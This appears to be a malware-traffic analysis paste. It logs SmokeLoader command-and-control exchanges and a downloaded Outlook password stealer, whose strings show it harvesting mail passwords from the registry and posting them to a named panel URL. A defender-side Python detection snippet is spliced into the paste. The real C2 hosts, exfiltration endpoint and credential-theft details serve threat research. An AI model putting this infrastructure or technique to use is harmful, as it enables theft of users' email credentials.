PepperPotts

smokeloader, downloading outlook stealer (2017-12-07)

Mar 25th, 2018
#SMOKELOADER

35103341abb740021017ce2757b186051920993aebe22ce413654eb7abe076de (First Submission 2017-12-07 09:22:53)

*Readable text of communications with CnC:

-POSTs to http://104.168.140.87/blog/ (Host header: pokpok.bit)

-The server answers "HTTP 404 Not Found", but the 404 carries content (the payload is delivered in the body of the error response)

-Second response is a PE file (a .NET assembly; some interesting strings from it: OutlookPasswordRecovery, decryptOutlookPassword, ...)

-Third response carries some additional URLs:
-PANEL: http://inseltech.com.mx/t1/lala.php
-OPENDIR: http://inseltech.com.mx/t1/
counter.txt -> stolen data
host.php
lala.php
out.exe
  20.  
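As an added defender-side example (not part of the paste), the three oddities in the exchange above, a POST whose Host header is a .bit domain, a 404 that still carries a body, and a text/html response whose body is a PE, turned into heuristics over a constructed request/response pair modelled on the capture:

```python
# Added example, not from the paste: heuristics for the C2 pattern described above,
# run over constructed HTTP messages modelled on the capture (not the original bytes).
PE_CHUNK = "MZ\x90\x00" + "\x00" * 60 + "!This program cannot be run in DOS mode."
SAMPLE_REQUEST = (
    "POST /blog/ HTTP/1.1\r\nHost: pokpok.bit\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 63\r\n\r\n" + "A" * 63
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\nServer: nginx/1.12.2\r\n"
    "Content-Type: text/html; charset=windows-1251\r\n"
    "Transfer-Encoding: chunked\r\n\r\n"
    f"{len(PE_CHUNK):x}\r\n{PE_CHUNK}\r\n0\r\n\r\n"
)

def parse_http(msg):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = msg.partition("\r\n\r\n")
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body

def dechunk(body):
    """Reassemble a chunked body; stops at the 0 chunk or on a malformed size."""
    out, pos = [], 0
    while (end := body.find("\r\n", pos)) >= 0:
        try:
            size = int(body[pos:end].split(";")[0], 16)
        except ValueError:
            break
        if size == 0:
            break
        out.append(body[end + 2:end + 2 + size])
        pos = end + 2 + size + 2
    return "".join(out)

def c2_indicators(request, response):
    """Return the SmokeLoader-style oddities seen in one request/response pair."""
    req_line, req_h, _ = parse_http(request)
    resp_line, resp_h, body = parse_http(response)
    if resp_h.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    found = []
    if req_h.get("host", "").lower().endswith(".bit"):
        found.append("namecoin-bit-host")  # .bit is not resolvable via normal DNS
    if " 404 " in resp_line and body and not body.lstrip().startswith("<"):
        found.append("404-non-html-body")  # "Not Found" that still carries data
    if resp_h.get("content-type", "").startswith("text/") and body.startswith("MZ"):
        found.append("pe-served-as-text")  # declared text/html, body is a PE
    return found
```

A genuine 404 (HTML body, ordinary Host) yields an empty list, so the heuristics can be applied to proxy logs without flagging every error page.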
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------

* tcp localhost:52606 ---> 104.168.140.87:80

---------------------------------------------------------------------------------------------------------
POST /blog/ HTTP/1.1[...]Cache-Control: no-cache[...]Connection: Keep-Alive[...]Pragma: no-cache[...]Content-Type: application/x-www-form-urlencoded[...]Host: pokpok.bit[...]User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)[...]Content-Length: 63[...]hIZz[...])

---------------------------------------------------------------------------------------------------------
POST /blog/ HTTP/1.1[...]Cache-Control: no-cache[...]Connection: Keep-Alive[...]Pragma: no-cache[...]Content-Type: application/x-www-form-urlencoded[...]Host: pokpok.bit[...]User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)[...]Content-Length: 63[...]hIZz[...])

---------------------------------------------------------------------------------------------------------
POST /blog/ HTTP/1.1[...]Cache-Control: no-cache[...]Connection: Keep-Alive[...]Pragma: no-cache[...]Content-Type: application/x-www-form-urlencoded[...]Host: pokpok.bit[...]User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)[...]Content-Length: 63[...]hIZz


---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------

* tcp 104.168.140.87:80 ---> localhost:52606

---------------------------------------------------------------------------------------------------------
HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:11:57 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]1f4f[...]6e7V[...]W T|

---------------------------------------------------------------------------------------------------------
HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:12:22 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]1f4f[...]!This program cannot be run in DOS mode.[...]
[... .NET PE strings dump omitted; the dropped assembly is OutlookPasswordRecovery.exe, built from C:\\Users\\W7\\Downloads\\OutlookPasswordRecovery-master\\OutlookPasswordRecovery-master\\OutlookPasswordRecovery\\obj\\Release\\OutlookPasswordRecovery.pdb, with an asInvoker manifest ...]

---------------------------------------------------------------------------------------------------------
HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:12:24 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">[...]<html><head>[...]<title>404 Not Found</title>[...]</head><body>[...]<h1>Not Found</h1>[...]<p>The requested URL /blog/ was not found on this server.</p>[...]<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>[...]<hr></body></html>[...]HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:12:24 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">[...]<html><head>[...]<title>404 Not Found</title>[...]</head><body>[...]<h1>Not Found</h1>[...]<p>The requested URL /blog/ was not found on this server.</p>[...]<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>[...]<hr></body></html>[...]uuuu[...]hey=[...]http://inseltech.com.mx/t1/lala.php[...]POST[...]application/x-www-form-urlencoded[...]http://ggl.com[...]Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)[...]IMAP Password[...]POP3 Password[...]HTTP Password[...]SMTP Password[...]Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676[...]Softwar[...]hey=[...]http://inseltech.com.mx/t1/lala.php[...]POST[...]application/x-www-form-urlencoded[...]http://ggl.com[...]Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)[...]IMAP Password[...]POP3 Password[...]HTTP Password[...]SMTP Password[...]Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676[...]Softwar[...]e\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Email[...]GetBytes[...]SMTP Server[...]Nothing[...]SMTP Port[...]Outlook[...]WinForms_RecursiveFormCreate[...]WinForms_SeeInnerException[...]OutlookPasswordRecovery.Resources[...]VS_VERSION_INFO[...]VarFileInfo[...]Translation[...]StringFileInfo[...]000004b0[...]FileDescription[...]ConsoleApplication1[...]FileVersion[...]1.0.0.0[...]InternalName[...]OutlookPasswordRecovery.exe[...]LegalCopyright[...]Copyright[...]2016[...]OriginalFilename[...]OutlookPasswordRecovery.exe[...]ProductName[...]ConsoleApplication1[...]ProductVersion[...]1.0.0.0[...]Assembly Version[...]1.0.0.0